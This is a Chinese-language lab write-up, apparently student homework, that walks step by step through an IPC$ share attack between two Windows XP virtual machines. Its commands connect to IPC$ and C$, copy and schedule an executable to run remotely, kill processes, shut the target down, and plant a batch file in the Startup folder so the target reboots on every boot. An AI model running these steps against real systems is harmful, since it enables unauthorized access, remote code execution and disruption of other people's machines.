网络安全攻防之IPC$攻击

                       IPC$空会话攻击

原创文章,是我的实验作业,将我做这个实验的过程记录下来,路途遥远,现在启程!

       我的实验环境是两台虚拟机,分别是windows xp sp3和windows xp sp2 。windows xp sp3作为主机,windows xp sp2作为靶机:

     1.首先在靶机端运行cmd,输入命令net share查看当前系统中的硬盘是否处于共享状态,windows xp等在默认情况下都是开启资源共享服务的,同时查看windows xp的IP地址为192.168.44.130



      2.文件共享服务对应的端口号分别是139(供NetBios名称使用),445(供IP地址使用),一般IPC$连接也是通过这两个端口的,所以在windows 2000的命令行中输入netstat –an查看当前这两个端口是否处于开启状态,如下图:



3.开始在windows xp端进行IPC$连接,在cmd中输入

net  use \\192.168.44.130\ipc$  “(此处为计算机用户的密码)” /user:”(用户名)”,如下图:



可以看到命令成功完成,说明建立IPC空会话成功

4.将windows 2000系统上C盘的内容共享,使用如下命令:

net use z: \\192.168.44.130\c$

输入该命令后,在主机系统上就会出现共享C盘内容的Z盘驱动器,如下图:





5.向远程计算机复制文件,把windows xp系统C盘上的sogou_explorer.exe 复制到靶机的C盘上,并命名为sogou_explorer.exe,过程如下图:



命令如下:copy c:\sogou_explorer.exe z:\sogou_explorer.exe:



可以看到Z盘上出现了sogou_explorer.exe文件:



6.查看靶机的系统时间,命令是 net time \\192.168.44.130:



7.令远程计算机运行指定程序:

用如下命令:at \\192.168.44.130 9:27 c:\sogou_explorer.exe  可以看到新添加了一项作业:



8. 列出远程计算机当前运行的进程,在命令行中输入

tasklist /s 192.168.44.130 /u (远程计算机用户名) /p (密码):



9.终止远程计算机中当前运行的进程:

我选择终止的进程是cmd.exe 进程PID是3596

输入命令:taskkill /s 192.168.44.130 /u (远程计算机用户名) /p (密码):



可以看到PID为3596的cmd.exe进程被终止了:

10. 关闭远程计算机:在命令行中输入命令:

shutdown –s –t 30–m \\192.168.44.130 令远程计算机倒计时30秒后自动关机:




事实上在远程计算机上可以看到它自己被远程用户连接,打开计算机管理,点击共享文件夹中的会话,可以看到当前计算机用户被远程连接了,还有连接时间,打开文件等信息显示:



接下来再做一件事,让对方主机开机后自动重启,首先在主机上编写shutdown.bat文件,文件内容是shutdown –r 将该文件通过上面的copy方式复制到靶机中,将shutdown.bat文件拷贝到启动文件夹中,则当靶机开机时会自动运行该bat文件,过程如下图:




在主机中点开我的电脑中的Z盘,即共享出的靶机的C盘资源,将这个shutdown.bat文件剪切粘贴到Z盘的启动目录 Z:\Documents and Settings\All Users\[开始]菜单\程序\启动,这样靶机在开机后会自动运行这个bat文件,就会出现开机自动重启的情况:



相关文章
相关标签/搜索